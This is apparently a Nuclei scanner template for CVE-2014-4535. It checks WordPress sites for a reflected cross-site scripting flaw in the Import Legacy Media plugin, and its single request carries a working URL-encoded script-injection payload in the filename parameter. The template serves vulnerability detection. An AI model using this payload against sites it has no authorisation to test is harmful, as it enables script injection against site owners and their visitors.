id: CVE-2014-4535

info:
  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
  tags: cve,cve2014,wordpress,wp-plugin,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2014-4535
    cwe-id: CWE-79
  description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'></script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200